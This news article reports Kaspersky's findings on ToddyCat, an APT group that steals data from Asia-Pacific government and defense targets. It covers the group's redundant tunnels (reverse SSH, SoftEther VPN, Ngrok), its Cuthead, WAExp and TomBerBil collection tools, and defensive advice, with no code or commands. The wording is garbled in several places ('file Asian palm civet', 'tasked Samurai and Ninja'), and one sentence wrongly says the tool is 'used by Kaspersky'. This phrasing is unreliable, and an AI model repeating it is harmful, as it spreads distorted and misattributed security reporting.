An APT (Advanced Persistent Threat) group. known as ToddyCat is collecting industrial-scale data from government and defense targets in the Asia-Pacific region.
Kaspersky researchers tracking the campaign described this week the threat actor using multiple simultaneous connections in victims’ environments to maintain persistence and steal data from them. They also discovered a number of new tools that ToddyCat (which is a common name for the file Asian palm civet) is used to enable data collection from victims’ systems and browsers.
Multiple traffic tunnels in ToddyCat cyber attacks
“Having different tunnels to the infected infrastructure implemented with different tools allows [the] attackers to maintain access to the systems even if one of the tunnels is discovered and eliminated,” security researchers from Kaspersky said in a statement. blog post this week. “By ensuring constant access to infrastructure, [the] attackers are able to perform reconnaissance and connect to remote hosts.”
ToddyCat is a likely Chinese-speaking threat actor that Kaspersky has been able to link to attacks dating back to at least December 2020. In its early stages, the group appeared to be focused on only a small number of organizations in Taiwan and Vietnam. But the threat actor quickly escalated the attacks after the public disclosure of the so-called ProxyLogon vulnerability in Microsoft Exchange Server in February 2021. Kaspersky believes that ToddyCat may have been among a group of threat actors targeting ProxyLogon vulnerabilities even before February 2021, but says it has yet to find evidence to support that conjecture.
In 2022 Kaspersky reported find ToddyCat actors using two new sophisticated malware tools tasked Samurai and Ninja with deploying China Chopper, a popular Web shell used in Microsoft Exchange Server attacks, on systems belonging to victims in Asia and Europe.
Persistent access maintenance, fresh malware
Kaspersky’s latest investigation into ToddyCat’s activities showed that the threat actor’s tactic to maintain persistent remote access to a compromised network is to establish multiple tunnels to it using different tools. These include using a reverse SSH tunnel to gain access to remote network services; using SoftEther VPN, an open source tool that enables VPN connections via OpenVPN, L2TP/IPSec, and other protocols; and using a lightweight agent (Ngrok) to redirect command and control from an attacker-controlled cloud infrastructure to hosts in the victim’s environment.
Furthermore, Kaspersky researchers discovered that the authors of ToddyCat use a fast reverse proxy client to allow access from the Internet to servers protected by a firewall or a Network Address Translation (NAT) mechanism.
Kaspersky’s investigation also showed that the threat actor uses at least three new tools in its data collection campaign. One of these is malware that Kaspersky has dubbed “Cuthead” that allows ToddyCat to search for files with specific extensions or words on the victim’s network and store them in an archive.
Another new tool used by Kaspersky in ToddyCat is “WAExp”. The malware’s job is to search for and collect browser data from the web version of WhatsApp.
“For users of the WhatsApp web app, the browser’s local storage contains profile details, chat data, phone numbers of users they chat with, and current session data,” Kaspersky researchers said. WAExp allows attacks to access this data by copying the browser’s local storage files, the security vendor noted.
The third tool meanwhile is called “TomBerBil” and allows ToddyCat actors to steal passwords from Chrome and Edge browsers.
“We have examined several tools that allow attackers to maintain access to targeted infrastructure and automatically search and collect data of interest,” Kaspersky said. “Attackers actively use techniques to bypass defenses in an attempt to disguise their presence on the system.”
The security vendor recommends that organizations block the IP addresses of cloud services that provide traffic tunneling and limit the tools that administrators can use to access hosts remotely. Organizations should also remove or closely monitor any unused remote access tools in the environment and encourage users not to store passwords in their browsers, Kaspersky said.